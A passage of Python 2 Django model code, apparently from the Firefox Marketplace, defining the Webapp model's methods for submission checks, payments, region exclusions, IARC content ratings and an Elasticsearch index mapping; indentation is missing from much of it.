return not self.details_errors()
def is_rated(self):
return self.content_ratings.exists()
def content_ratings_complete(self):
"""Checks for waffle."""
return not waffle.switch_is_active('iarc') or self.is_rated()
def all_payment_accounts(self):
# TODO: cache this somehow. Using @cached_property was hard because
# there's no easy way to invalidate something that should be
# recalculated.
return (self.app_payment_accounts.select_related('payment_account')
.all())
def payment_account(self, provider_id):
qs = (self.app_payment_accounts.select_related('payment_account')
.filter(payment_account__provider=provider_id))
try:
return qs.get()
except AddonPaymentAccount.DoesNotExist, exc:
log.info('non-existant payment account for app {app}: '
'{exc.__class__.__name__}: {exc}'
.format(app=self, exc=exc))
raise self.PayAccountDoesNotExist(
'No payment account for {app} named {pr}. '
'Choices: {all}'
.format(app=self,
pr=PROVIDER_CHOICES[provider_id],
all=[PROVIDER_CHOICES[a.payment_account.provider]
for a in self.all_payment_accounts()]))
def has_payment_account(self):
"""True if app has at least one payment account."""
return bool(self.all_payment_accounts().count())
def has_multiple_payment_accounts(self):
"""True if the app has more than one payment account."""
return self.all_payment_accounts().count() > 1
def payments_complete(self):
"""Also returns True if the app doesn't needs payments."""
return not self.needs_payment() or self.has_payment_account()
def completion_errors(self, ignore_ratings=False):
"""
Compiles all submission steps into a single error report.
ignore_ratings -- doesn't check for content_ratings for cases in which
content ratings were just created.
"""
errors = {}
if not self.details_complete():
errors['details'] = self.details_errors()
if not ignore_ratings and not self.content_ratings_complete():
errors['content_ratings'] = _('You must set up content ratings.')
if not self.payments_complete():
errors['payments'] = _('You must set up a payment account.')
return errors
def completion_error_msgs(self):
"""Returns submission error messages as a flat list."""
errors = self.completion_errors()
# details is a list of msgs instead of a string like others.
detail_errors = errors.pop('details', []) or []
return detail_errors + errors.values()
def is_fully_complete(self, ignore_ratings=False):
"""
Wrapper to submission errors for readability and testability (mocking).
"""
return not self.completion_errors(ignore_ratings)
def next_step(self):
"""
Gets the next step to fully complete app submission.
"""
if self.has_incomplete_status() and not self.details_complete():
# Some old public apps may have some missing detail fields.
return {
'name': _('Details'),
'description': _('This app\'s submission process has not been '
'fully completed.'),
'url': self.get_dev_url(),
}
elif not self.content_ratings_complete():
return {
'name': _('Content Ratings'),
'description': _('This app needs to get a content rating.'),
'url': self.get_dev_url('ratings'),
}
elif not self.payments_complete():
return {
'name': _('Payments'),
'description': _('This app needs a payment account set up.'),
'url': self.get_dev_url('payments'),
}
@amo.cached_property(writable=True)
def is_offline(self):
"""
Returns a boolean of whether this is an app that degrades
gracefully offline (i.e., is a packaged app or has an
`appcache_path` defined in its manifest).
"""
if self.is_packaged:
return True
manifest = self.get_manifest_json()
return bool(manifest and 'appcache_path' in manifest)
def mark_done(self):
"""When the submission process is done, update status accordingly."""
self.update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
    def update_status(self, **kwargs):
        """Recompute this app's status from its versions/files.

        No-ops for deleted/disabled/blocked or incomplete apps. Otherwise:
        no versions (or none with files) -> NULL; pending files with no
        public ones -> PENDING.
        """
        if (self.is_deleted or self.is_disabled or
            self.status == amo.STATUS_BLOCKED):
            return
        def _log(reason, old=self.status):
            # Log both to the app log and to the activity log.
            log.info(u'Update app status [%s]: %s => %s (%s).' % (
                self.id, old, self.status, reason))
            amo.log(amo.LOG.CHANGE_STATUS, self.get_status_display(), self)
        # Handle the case of no versions.
        if not self.versions.exists():
            self.update(status=amo.STATUS_NULL)
            _log('no versions')
            return
        # Handle the case of versions with no files.
        if not self.versions.filter(files__isnull=False).exists():
            self.update(status=amo.STATUS_NULL)
            _log('no versions with files')
            return
        # If the app is incomplete, don't update status.
        if not self.is_fully_complete():
            return
        # If there are no public versions and at least one pending, set status
        # to pending.
        public_statuses = amo.WEBAPPS_APPROVED_STATUSES
        has_public = (
            self.versions.filter(files__status__in=public_statuses).exists()
        )
        has_pending = (
            self.versions.filter(files__status=amo.STATUS_PENDING).exists())
        # Check for self.is_pending() first to prevent possible recursion.
        if not has_public and has_pending and not self.is_pending():
            self.update(status=amo.STATUS_PENDING)
            _log('has pending but no public files')
            return
def authors_other_addons(self, app=None):
"""Return other apps by the same author."""
return (self.__class__.objects.visible()
.filter(type=amo.ADDON_WEBAPP)
.exclude(id=self.id).distinct()
.filter(addonuser__listed=True,
authors__in=self.listed_authors))
def can_be_purchased(self):
return self.is_premium() and self.status in amo.REVIEWED_STATUSES
def can_purchase(self):
return self.is_premium() and self.premium and self.is_public()
def is_purchased(self, user):
return user and self.id in user.purchase_ids()
def is_pending(self):
return self.status == amo.STATUS_PENDING
def is_visible(self, request):
"""Returns whether the app has a visible search result listing. Its
detail page will always be there.
This does not consider whether an app is excluded in the current region
by the developer.
"""
# Let developers see it always.
can_see = (self.has_author(request.amo_user) or
action_allowed(request, 'Apps', 'Edit'))
# Let app reviewers see it only when it's pending.
if check_reviewer(request, only='app') and self.is_pending():
can_see = True
visible = False
if can_see:
# Developers and reviewers should see it always.
visible = True
elif self.is_public():
# Everyone else can see it only if it's public -
# and if it's a game, it must have a content rating.
visible = True
return visible
def has_premium(self):
"""If the app is premium status and has a premium object."""
return bool(self.is_premium() and self.premium)
def get_price(self, carrier=None, region=None, provider=None):
"""
A shortcut to get the price as decimal. Returns None if their is no
price for the app.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
if self.has_premium() and self.premium.price:
return self.premium.price.get_price(carrier=carrier, region=region,
provider=provider)
def get_price_locale(self, carrier=None, region=None, provider=None):
"""
A shortcut to get the localised price with currency. Returns None if
their is no price for the app.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
if self.has_premium() and self.premium.price:
return self.premium.price.get_price_locale(
carrier=carrier, region=region, provider=provider)
def get_tier(self):
"""
Returns the price tier object.
"""
if self.has_premium():
return self.premium.price
def get_tier_name(self):
"""
Returns the price tier for showing prices in the reviewer
tools and developer hub.
"""
tier = self.get_tier()
if tier:
return tier.tier_locale()
@amo.cached_property
def promo(self):
return self.get_promo()
def get_promo(self):
try:
return self.previews.filter(position=-1)[0]
except IndexError:
pass
def get_region_ids(self, restofworld=False, excluded=None):
"""
Return IDs of regions in which this app is listed.
If `excluded` is provided we'll use that instead of doing our own
excluded lookup.
"""
if restofworld:
all_ids = mkt.regions.ALL_REGION_IDS
else:
all_ids = mkt.regions.REGION_IDS
if excluded is None:
excluded = list(self.addonexcludedregion
.values_list('region', flat=True))
return sorted(set(all_ids) - set(excluded or []))
def get_excluded_region_ids(self):
"""
Return IDs of regions for which this app is excluded.
This will be all the addon excluded regions. If the app is premium,
this will also exclude any region that does not have the price tier
set.
Note: free and in-app are not included in this.
"""
excluded = set(self.addonexcludedregion
.values_list('region', flat=True))
if self.is_premium():
all_regions = set(mkt.regions.ALL_REGION_IDS)
# Find every region that does not have payments supported
# and add that into the exclusions.
excluded = excluded.union(
all_regions.difference(self.get_price_region_ids()))
geo = self.geodata
if geo.region_de_iarc_exclude or geo.region_de_usk_exclude:
excluded.add(mkt.regions.DE.id)
if geo.region_br_iarc_exclude:
excluded.add(mkt.regions.BR.id)
return sorted(list(excluded))
def get_price_region_ids(self):
tier = self.get_tier()
if tier:
return sorted(p['region'] for p in tier.prices() if p['paid'])
return []
def get_regions(self, regions=None):
"""
Return a list of regions objects the app is available in, e.g.:
[<class 'mkt.constants.regions.BR'>,
<class 'mkt.constants.regions.CA'>,
<class 'mkt.constants.regions.UK'>,
<class 'mkt.constants.regions.US'>,
<class 'mkt.constants.regions.RESTOFWORLD'>]
if `regions` is provided we'll use that instead of calling
self.get_region_ids()
"""
regions_ids = regions or self.get_region_ids(restofworld=True)
_regions = map(mkt.regions.REGIONS_CHOICES_ID_DICT.get, regions_ids)
return sorted(_regions, key=lambda x: x.slug)
def listed_in(self, region=None, category=None):
listed = []
if region:
listed.append(region.id in self.get_region_ids(restofworld=True))
if category:
if isinstance(category, basestring):
filters = {'slug': category}
else:
filters = {'id': category.id}
listed.append(self.category_set.filter(**filters).exists())
return all(listed or [False])
def content_ratings_in(self, region, category=None):
"""
Get all content ratings for this app in REGION for CATEGORY.
(e.g. give me the content ratings for a game listed in a Brazil.)
"""
# If we want to find games in Brazil with content ratings, then
# make sure it's actually listed in Brazil and it's a game.
if category and not self.listed_in(region, category):
return []
rb = []
if not region.ratingsbody:
# If a region doesn't specify a ratings body, default to GENERIC.
rb = mkt.ratingsbodies.GENERIC.id
else:
rb = region.ratingsbody.id
return list(self.content_ratings.filter(ratings_body=rb)
.order_by('rating'))
    @classmethod
    def now(cls):
        # Today's date as a datetime.date.
        return datetime.date.today()
@classmethod
def from_search(cls, request, cat=None, region=None, gaia=False,
mobile=False, tablet=False, filter_overrides=None):
filters = {
'type': amo.ADDON_WEBAPP,
'status': amo.STATUS_PUBLIC,
'is_disabled': False,
}
# Special handling if status is 'any' to remove status filter.
if filter_overrides and 'status' in filter_overrides:
if filter_overrides['status'] is 'any':
del filters['status']
del filter_overrides['status']
if filter_overrides:
filters.update(filter_overrides)
if cat:
filters.update(category=cat.slug)
srch = S(WebappIndexer).filter(**filters)
if (region and
not waffle.flag_is_active(request, 'override-region-exclusion')):
srch = srch.filter(~F(region_exclusions=region.id))
if mobile or gaia:
srch = srch.filter(uses_flash=False)
return srch
@classmethod
def category(cls, slug):
try:
return (Category.objects
.filter(type=amo.ADDON_WEBAPP, slug=slug))[0]
except IndexError:
return None
    def in_rereview_queue(self):
        # True when the app currently has an entry in the re-review queue.
        return self.rereviewqueue_set.exists()
def get_cached_manifest(self, force=False):
"""
Creates the "mini" manifest for packaged apps and caches it.
Call this with `force=True` whenever we need to update the cached
version of this manifest, e.g., when a new version of the packaged app
is approved.
If the addon is not a packaged app, this will not cache anything.
"""
if not self.is_packaged:
return
key = 'webapp:{0}:manifest'.format(self.pk)
if not force:
data = cache.get(key)
if data:
return data
version = self.current_version
if not version:
# There's no valid version so we return an empty mini-manifest.
# Note: We want to avoid caching this so when a version does become
# available it can get picked up correctly.
return '{}'
else:
file_obj = version.all_files[0]
manifest = self.get_manifest_json(file_obj)
package_path = absolutify(
os.path.join(reverse('downloads.file', args=[file_obj.id]),
file_obj.filename))
data = {
'name': manifest['name'],
'version': version.version,
'size': storage.size(file_obj.signed_file_path),
'release_notes': version.releasenotes,
'package_path': package_path,
}
for key in ['developer', 'icons', 'locales']:
if key in manifest:
data[key] = manifest[key]
data = json.dumps(data, cls=JSONEncoder)
cache.set(key, data, None)
return data
    def sign_if_packaged(self, version_pk, reviewer=False):
        # Sign the given version's package; no-op (returns None) for
        # hosted apps, which have nothing to sign.
        if not self.is_packaged:
            return
        return packaged.sign(version_pk, reviewer=reviewer)
def assign_uuid(self):
"""Generates a UUID if self.guid is not already set."""
if not self.guid:
max_tries = 10
tried = 1
guid = str(uuid.uuid4())
while tried <= max_tries:
if not Webapp.objects.filter(guid=guid).exists():
self.guid = guid
break
else:
guid = str(uuid.uuid4())
tried += 1
else:
raise ValueError('Could not auto-generate a unique UUID')
def is_premium_type_upgrade(self, premium_type):
"""
Returns True if changing self.premium_type from current value to passed
in value is considered an upgrade that should trigger a re-review.
"""
ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
free_upgrade = ALL - set([amo.ADDON_FREE])
free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
if (self.premium_type == amo.ADDON_FREE and
premium_type in free_upgrade):
return True
if (self.premium_type == amo.ADDON_FREE_INAPP and
premium_type in free_inapp_upgrade):
return True
return False
    def create_blocklisted_version(self):
        """
        Creates a new version who's file is the blocklisted app found in /media
        and sets status to STATUS_BLOCKLISTED.
        """
        blocklisted_path = os.path.join(settings.MEDIA_ROOT, 'packaged-apps',
                                        'blocklisted.zip')
        v = Version.objects.create(addon=self, version='blocklisted')
        f = File(version=v, status=amo.STATUS_BLOCKED,
                 platform=Platform.objects.get(id=amo.PLATFORM_ALL.id))
        f.filename = f.generate_filename()
        # Copy the canned blocklist package into place as this version's file.
        copy_stored_file(blocklisted_path, f.file_path)
        log.info(u'[Webapp:%s] Copied blocklisted app from %s to %s' % (
            self.id, blocklisted_path, f.file_path))
        f.size = storage.size(f.file_path)
        f.hash = f.generate_hash(f.file_path)
        f.save()
        # Store the package's manifest alongside the version.
        mf = WebAppParser().get_json_data(f.file_path)
        AppManifest.objects.create(version=v, manifest=json.dumps(mf))
        self.sign_if_packaged(v.pk)
        # Block the app itself and make the blocklist version current.
        self.status = amo.STATUS_BLOCKED
        self._current_version = v
        self.save()
    def update_name_from_package_manifest(self):
        """
        Looks at the manifest.webapp inside the current version's file and
        updates the app's name and translated names.

        Note: Make sure the correct version is in place before calling this.
        """
        # Only packaged apps carry a manifest in their file.
        if not self.is_packaged:
            return None

        file_ = self.current_version.all_files[0]
        mf = self.get_manifest_json(file_)

        # Get names in "locales" as {locale: name}.
        locale_names = get_locale_properties(mf, 'name', self.default_locale)

        # Check changes to default_locale.
        locale_changed = self.update_default_locale(mf.get('default_locale'))
        if locale_changed:
            log.info(u'[Webapp:%s] Default locale changed from "%s" to "%s".'
                     % (self.pk, locale_changed[0], locale_changed[1]))

        # Update names; only save when update_names reports actual changes.
        crud = self.update_names(locale_names)
        if any(crud.values()):
            self.save()
def update_supported_locales(self, latest=False, manifest=None):
"""
Loads the manifest (for either hosted or packaged) and updates
Version.supported_locales for the current version or latest version if
latest=True.
"""
version = self.versions.latest() if latest else self.current_version
if not manifest:
file_ = version.all_files[0]
manifest = self.get_manifest_json(file_)
updated = False
supported_locales = ','.join(get_supported_locales(manifest))
if version.supported_locales != supported_locales:
updated = True
version.update(supported_locales=supported_locales, _signal=False)
return updated
@property
def app_type_id(self):
"""
Returns int of `1` (hosted), `2` (packaged), or `3` (privileged).
Used by ES.
"""
if self.latest_version and self.latest_version.is_privileged:
return amo.ADDON_WEBAPP_PRIVILEGED
elif self.is_packaged:
return amo.ADDON_WEBAPP_PACKAGED
return amo.ADDON_WEBAPP_HOSTED
    @property
    def app_type(self):
        """
        Returns string of 'hosted', 'packaged', or 'privileged'.
        Used in the API.
        """
        # Maps the numeric app_type_id through amo.ADDON_WEBAPP_TYPES.
        return amo.ADDON_WEBAPP_TYPES[self.app_type_id]
@property
def supported_locales(self):
"""
Returns a tuple of the form:
(localized default_locale, list of localized supported locales)
for the current public version.
"""
languages = []
version = self.current_version
if version:
for locale in version.supported_locales.split(','):
if locale:
language = settings.LANGUAGES.get(locale.lower())
if language:
languages.append(language)
return (
settings.LANGUAGES.get(self.default_locale.lower()),
sorted(languages)
)
    @property
    def developer_name(self):
        """This is the developer name extracted from the manifest."""
        # Implicitly returns None when there is no current version.
        if self.current_version:
            return self.current_version.developer_name
def get_trending(self, region=None):
"""
Returns trending value.
If no region, uses global value.
If region and region is not mature, uses global value.
Otherwise uses regional trending value.
"""
if region and not region.adolescent:
by_region = region.id
else:
by_region = 0
try:
return self.trending.get(region=by_region).value
except ObjectDoesNotExist:
return 0
    def iarc_token(self):
        """
        Simple hash to verify token in pingback API.
        """
        # SHA-512 over SECRET_KEY + app id, so both sides can recompute it.
        return hashlib.sha512(settings.SECRET_KEY + str(self.id)).hexdigest()
def get_content_ratings_by_body(self, es=False):
"""
Gets content ratings on this app keyed by bodies.
es -- denotes whether to return ES-friendly results (just the IDs of
rating classes) to fetch and translate later.
"""
content_ratings = {}
for cr in self.content_ratings.all():
body = cr.get_body()
rating_serialized = {
'body': body.id,
'rating': cr.get_rating().id
}
if not es:
rating_serialized = dehydrate_content_rating(rating_serialized)
content_ratings[body.label] = rating_serialized
return content_ratings
def get_descriptors_slugs(self):
"""
Return list of content descriptor slugs (e.g., ['has_esrb_drugs'...]).
"""
try:
app_descriptors = self.rating_descriptors
except RatingDescriptors.DoesNotExist:
return []
descriptors = []
for key in mkt.ratingdescriptors.RATING_DESCS.keys():
field = 'has_%s' % key.lower() # Build the field name.
if getattr(app_descriptors, field):
descriptors.append(key)
return descriptors
def get_interactives_slugs(self):
"""
Return list of interactive element slugs (e.g., ['shares_info'...]).
"""
try:
app_interactives = self.rating_interactives
except RatingInteractives.DoesNotExist:
return []
interactives = []
for key in mkt.ratinginteractives.RATING_INTERACTIVES.keys():
field = 'has_%s' % key.lower()
if getattr(app_interactives, field):
interactives.append(key)
return interactives
    def get_descriptors_dehydrated(self):
        """
        Return lists of descriptors slugs by body
        (e.g., {'esrb': ['real-gambling'], 'pegi': ['scary']}).
        """
        # Delegates the slug->body grouping to the module-level helper.
        return dehydrate_descriptors(self.get_descriptors_slugs())
    def get_interactives_dehydrated(self):
        """
        Return lists of interactive element slugs
        (e.g., ['shares-info', 'shares-location']).
        """
        # Delegates slug normalization to the module-level helper.
        return dehydrate_interactives(self.get_interactives_slugs())
def get_descriptors_full(self):
"""
Return descriptor objects (label, name) by body.
(e.g., {'esrb': {'label': 'blood', 'name': 'Blood'}}).
"""
keys = self.get_descriptors_slugs()
results = defaultdict(list)
for key in keys:
obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
if obj:
# Slugify and remove body prefix.
body, label = key.lower().replace('_', '-').split('-', 1)
results[body].append({
'label': label,
'name': unicode(obj['name']),
})
return dict(results)
def get_interactives_full(self):
"""
Return list of interactive element objects (label, name).
e.g., [{'label': 'social-networking', 'name': 'Facebocks'}, ...].
"""
keys = self.get_interactives_slugs()
results = []
for key in keys:
obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
if obj:
results.append({
'label': key.lower().replace('_', '-'),
'name': unicode(obj['name']),
})
return results
def set_iarc_info(self, submission_id, security_code):
"""
Sets the iarc_info for this app.
"""
data = {'submission_id': submission_id,
'security_code': security_code}
info, created = IARCInfo.objects.safer_get_or_create(
addon=self, defaults=data)
if not created:
info.update(**data)
@write
def set_content_ratings(self, data):
"""
Central method for setting content ratings.
This overwrites or creates ratings, it doesn't delete and expects data
of the form::
{<ratingsbodies class>: <rating class>, ...}
"""
from . import tasks
if not data:
return
log.info('IARC setting content ratings for app:%s:%s' %
(self.id, self.app_slug))
for ratings_body, rating in data.items():
cr, created = self.content_ratings.safer_get_or_create(
ratings_body=ratings_body.id, defaults={'rating': rating.id})
if not created:
cr.update(rating=rating.id, modified=datetime.datetime.now())
log.info('IARC content ratings set for app:%s:%s' %
(self.id, self.app_slug))
self.set_iarc_storefront_data() # Ratings updated, sync with IARC.
geodata, c = Geodata.objects.get_or_create(addon=self)
save = False
# If app gets USK Rating Refused, exclude it from Germany.
has_usk_refused = self.content_ratings.filter(
ratings_body=mkt.ratingsbodies.USK.id,
rating=mkt.ratingsbodies.USK_REJECTED.id).exists()
save = geodata.region_de_usk_exclude != has_usk_refused
geodata.region_de_usk_exclude = has_usk_refused
# Un-exclude games in Brazil/Germany once they get a content rating.
save = (save or
geodata.region_br_iarc_exclude or
geodata.region_de_iarc_exclude)
geodata.region_br_iarc_exclude = False
geodata.region_de_iarc_exclude = False
# Un-disable apps that were disabled by the great IARC purge.
if (self.status == amo.STATUS_DISABLED and self.iarc_purged):
self.update(status=amo.STATUS_PUBLIC, iarc_purged=False)
if save:
geodata.save()
log.info('Un-excluding IARC-excluded app:%s from br/de')
tasks.index_webapps.delay([self.id])
@write
def set_descriptors(self, data):
"""
Sets IARC rating descriptors on this app.
This overwrites or creates elements, it doesn't delete and expects data
of the form:
[<has_descriptor_1>, <has_descriptor_6>]
"""
log.info('IARC setting descriptors for app:%s:%s' %
(self.id, self.app_slug))
create_kwargs = {}
for desc in mkt.ratingdescriptors.RATING_DESCS.keys():
has_desc_attr = 'has_%s' % desc.lower()
create_kwargs[has_desc_attr] = has_desc_attr in data
rd, created = RatingDescriptors.objects.get_or_create(
addon=self, defaults=create_kwargs)
if not created:
rd.update(modified=datetime.datetime.now(),
**create_kwargs)
log.info('IARC descriptors set for app:%s:%s' %
(self.id, self.app_slug))
@write
def set_interactives(self, data):
"""
Sets IARC interactive elements on this app.
This overwrites or creates elements, it doesn't delete and expects data
of the form:
[<has_interactive_1>, <has_interactive name 2>]
"""
create_kwargs = {}
for interactive in mkt.ratinginteractives.RATING_INTERACTIVES.keys():
interactive = 'has_%s' % interactive.lower()
create_kwargs[interactive] = interactive in map(
lambda x: x.lower(), data)
ri, created = RatingInteractives.objects.get_or_create(
addon=self, defaults=create_kwargs)
if not created:
ri.update(**create_kwargs)
log.info('IARC interactive elements set for app:%s:%s' %
(self.id, self.app_slug))
def set_iarc_storefront_data(self, disable=False):
"""Send app data to IARC for them to verify."""
if not waffle.switch_is_active('iarc'):
return
try:
iarc_info = self.iarc_info
except IARCInfo.DoesNotExist:
# App wasn't rated by IARC, return.
return
release_date = datetime.date.today()
if self.status in amo.WEBAPPS_APPROVED_STATUSES:
version = self.current_version
if version and version.reviewed:
release_date = version.reviewed
elif self.status in amo.WEBAPPS_EXCLUDED_STATUSES:
# Using `_latest_version` since the property returns None when
# deleted.
version = self._latest_version
# Send an empty string to signify the app was removed.
release_date = ''
else:
# If not approved or one of the disabled statuses, we shouldn't be
# calling SET_STOREFRONT_DATA. Ignore this call.
return
log.debug('Calling SET_STOREFRONT_DATA for app:%s' % self.id)
xmls = []
for cr in self.content_ratings.all():
xmls.append(render_xml('set_storefront_data.xml', {
'app_url': self.get_url_path(),
'submission_id': iarc_info.submission_id,
'security_code': iarc_info.security_code,
'rating_system': cr.get_body().iarc_name,
'release_date': '' if disable else release_date,
'title': get_iarc_app_title(self),
'company': version.developer_name if version else '',
'rating': cr.get_rating().iarc_name,
'descriptors': self.rating_descriptors.iarc_deserialize(
body=cr.get_body()),
'interactive_elements':
self.rating_interactives.iarc_deserialize(),
}))
for xml in xmls:
r = get_iarc_client('services').Set_Storefront_Data(XMLString=xml)
log.debug('IARC result app:%s, rating_body:%s: %s' % (
self.id, cr.get_body().iarc_name, r))
def last_rated_time(self):
"""Most recent content rating modified time or None if not rated."""
if self.is_rated():
return self.content_ratings.order_by('-modified')[0].modified
class Trending(amo.models.ModelBase):
    # Trending score rows, one per (addon, region) pair.
    addon = models.ForeignKey(Addon, related_name='trending')
    # The trending score value.
    value = models.FloatField(default=0.0)
    # When region=0, it's trending using install counts across all regions.
    region = models.PositiveIntegerField(null=False, default=0, db_index=True)

    class Meta:
        db_table = 'addons_trending'
        unique_together = ('addon', 'region')
class WebappIndexer(MappingType, Indexable):
    """
    Mapping type for Webapp models.

    By default we will return these objects rather than hit the database so
    include here all the things we need to avoid hitting the database.
    """

    @classmethod
    def get_mapping_type_name(cls):
        """
        Returns mapping type name which is used as the key in ES_INDEXES to
        determine which index to use.

        We override this because Webapp is a proxy model to Addon.
        """
        return 'webapp'

    @classmethod
    def get_index(cls):
        # The ES index name for this mapping type, from settings.
        return settings.ES_INDEXES[cls.get_mapping_type_name()]

    @classmethod
    def get_model(cls):
        # The Django model this mapping type indexes.
        return Webapp

    @classmethod
    def get_settings(cls, settings_override=None):
        """
        Returns settings to be passed to ES create_index.

        If `settings_override` is provided, this will use `settings_override`
        to override the defaults defined here.
        """
        default_settings = {
            'number_of_replicas': settings.ES_DEFAULT_NUM_REPLICAS,
            'number_of_shards': settings.ES_DEFAULT_NUM_SHARDS,
            'refresh_interval': '5s',
            'store.compress.tv': True,
            'store.compress.stored': True,
            'analysis': cls.get_analysis(),
        }
        if settings_override:
            default_settings.update(settings_override)
        return default_settings

    @classmethod
    def get_analysis(cls):
        """
        Returns the analysis dict to be used in settings for create_index.

        For languages that ES supports we define either the minimal or light
        stemming, which isn't as aggresive as the snowball stemmer. We also
        define the stopwords for that language.

        For all languages we've customized we're using the ICU plugin.
        """
        filters = {}
        analyzers = {}

        # Customize the word_delimiter filter to set various options.
        filters['custom_word_delimiter'] = {
            'type': 'word_delimiter',
            'preserve_original': True,
        }

        # The default is used for fields that need ICU but are composed of
        # many languages.
        analyzers['default_icu'] = {
            'type': 'custom',
            'tokenizer': 'icu_tokenizer',
            'filter': ['custom_word_delimiter', 'icu_folding',
                       'icu_normalizer'],
        }

        # Build a per-language analyzer (stemmer + stopwords) for every
        # language we have a stemmer mapping for.
        for lang, stemmer in amo.STEMMER_MAP.items():
            filters['%s_stem_filter' % lang] = {
                'type': 'stemmer',
                'name': stemmer,
            }
            filters['%s_stop_filter' % lang] = {
                'type': 'stop',
                'stopwords': ['_%s_' % lang],
            }
            analyzers['%s_analyzer' % lang] = {
                'type': 'custom',
                'tokenizer': 'icu_tokenizer',
                'filter': [
                    'custom_word_delimiter', 'icu_folding', 'icu_normalizer',
                    '%s_stop_filter' % lang, '%s_stem_filter' % lang
                ],
            }
        return {
            'analyzer': analyzers,
            'filter': filters,
        }

    @classmethod
    def setup_mapping(cls):
        """Creates the ES index/mapping."""
        cls.get_es().create_index(cls.get_index(),
                                  {'mappings': cls.get_mapping(),
                                   'settings': cls.get_settings()})

    @classmethod
    def get_mapping(cls):
        # Builds the full ES mapping dict for the 'webapp' doc type.
        doc_type = cls.get_mapping_type_name()

        def _locale_field_mapping(field, analyzer):
            # Maps e.g. ('name', 'es') -> {'name_es': {...}} picking the
            # custom analyzer when one was defined in get_analysis().
            get_analyzer = lambda a: (
                '%s_analyzer' % a if a in amo.STEMMER_MAP else a)
            return {'%s_%s' % (field, analyzer): {
                'type': 'string', 'analyzer': get_analyzer(analyzer)}}

        mapping = {
            doc_type: {
                # Disable _all field to reduce index size.
                '_all': {'enabled': False},
                # Add a boost field to enhance relevancy of a document.
                '_boost': {'name': '_boost', 'null_value': 1.0},
                'properties': {
                    'id': {'type': 'long'},
                    'app_slug': {'type': 'string'},
                    'app_type': {'type': 'byte'},
                    'author': {'type': 'string'},
                    'average_daily_users': {'type': 'long'},
                    'banner_regions': {
                        'type': 'string',
                        'index': 'not_analyzed'
                    },
                    'bayesian_rating': {'type': 'float'},
                    'category': {
                        'type': 'string',
                        'index': 'not_analyzed'
                    },
                    'collection': {
                        'type': 'nested',
                        'include_in_parent': True,
                        'properties': {
                            'id': {'type': 'long'},
                            'order': {'type': 'short'}
                        }
                    },
                    'content_descriptors': {
                        'type': 'string',
                        'index': 'not_analyzed'
                    },
                    'content_ratings': {
                        'type': 'object',
                        'dynamic': 'true',
                    },
                    'created': {'format': 'dateOptionalTime', 'type': 'date'},
                    'current_version': {'type': 'string',
                                        'index': 'not_analyzed'},
                    'default_locale': {'type': 'string',
                                       'index': 'not_analyzed'},
                    'description': {'type': 'string',
                                    'analyzer': 'default_icu'},
                    'device': {'type': 'byte'},
                    'features': {
                        'type': 'object',
                        'properties': dict(
                            ('has_%s' % f.lower(), {'type': 'boolean'})
                            for f in APP_FEATURES)
                    },
                    'has_public_stats': {'type': 'boolean'},
                    'icon_hash': {'type': 'string',
                                  'index': 'not_analyzed'},
                    'interactive_elements': {
                        'type': 'string',
                        'index': 'not_analyzed'
                    },
                    'is_disabled': {'type': 'boolean'},
                    'is_escalated': {'type': 'boolean'},
                    'is_offline': {'type': 'boolean'},
                    'last_updated': {'format': 'dateOptionalTime',
                                     'type': 'date'},
                    'latest_version': {
                        'type': 'object',
                        'properties': {
                            'status': {'type': 'byte'},
                            'is_privileged': {'type': 'boolean'},
                            'has_editor_comment': {'type': 'boolean'},
                            'has_info_request': {'type': 'boolean'},
                        },
                    },
                    'manifest_url': {'type': 'string',
                                     'index': 'not_analyzed'},
                    'modified': {'format': 'dateOptionalTime',
                                 'type': 'date',
                                 'index': 'not_analyzed'},
                    # Name for searching.
                    'name': {'type': 'string', 'analyzer': 'default_icu'},
                    # Name for sorting.
                    'name_sort': {'type': 'string', 'index': 'not_analyzed'},
                    # Name for suggestions.
                    'name_suggest': {'type': 'completion', 'payloads': True},
                    'owners': {'type': 'long'},
                    'popularity': {'type': 'long'},
                    'premium_type': {'type': 'byte'},
                    'previews': {
                        'type': 'object',
                        'dynamic': 'true',
                    },
                    'price_tier': {'type': 'string',
                                   'index': 'not_analyzed'},
                    'ratings': {
                        'type': 'object',
                        'properties': {
                            'average': {'type': 'float'},
                            'count': {'type': 'short'},
                        }
                    },
                    'region_exclusions': {'type': 'short'},
                    'reviewed': {'format': 'dateOptionalTime', 'type': 'date'},
                    'status': {'type': 'byte'},
                    'supported_locales': {'type': 'string',
                                          'index': 'not_analyzed'},
                    'tags': {'type': 'string', 'analyzer': 'simple'},
                    'type': {'type': 'byte'},
                    'upsell': {
                        'type': 'object',
                        'properties': {
                            'id': {'type': 'long'},
                            'app_slug': {'type': 'string',
                                         'index': 'not_analyzed'},
                            'icon_url': {'type': 'string',
                                         'index': 'not_analyzed'},
                            'name': {'type': 'string',
                                     'index': 'not_analyzed'},
                            'region_exclusions': {'type': 'short'},
                        }
                    },
                    'uses_flash': {'type': 'boolean'},
                    'versions': {
                        'type': 'object',
                        'properties': {
                            'version': {'type': 'string',
                                        'index': 'not_analyzed'},
                            'resource_uri': {'type': 'string',
                                             'index': 'not_analyzed'},
                        }
                    },
                    'weekly_downloads': {'type': 'long'},
                    'weight': {'type': 'short'},
                }
            }
        }

        # Add popularity by region.
        for region in mkt.regions.ALL_REGION_IDS:
            mapping[doc_type]['properties'].update(
                {'popularity_%s' % region: {'type': 'long'}})

        # Add fields that we expect to return all translations.
        for field in ('banner_message', 'description', 'homepage', 'name',
                      'release_notes', 'support_email', 'support_url'):
            mapping[doc_type]['properties'].update({
                '%s_translations' % field: {
                    'type': 'object',
                    'properties': {
                        'lang': {'type': 'string',
                                 'index': 'not_analyzed'},
                        'string': {'type': 'string',
                                   'index': 'not_analyzed'},
                    }
                }
            })

        # Add room for language-specific indexes.
        for analyzer in amo.SEARCH_ANALYZER_MAP:
            if (not settings.ES_USE_PLUGINS and
                analyzer in amo.SEARCH_ANALYZER_PLUGINS):
                log.info('While creating mapping, skipping the %s analyzer'
                         % analyzer)
                continue

            mapping[doc_type]['properties'].update(
                _locale_field_mapping('name', analyzer))
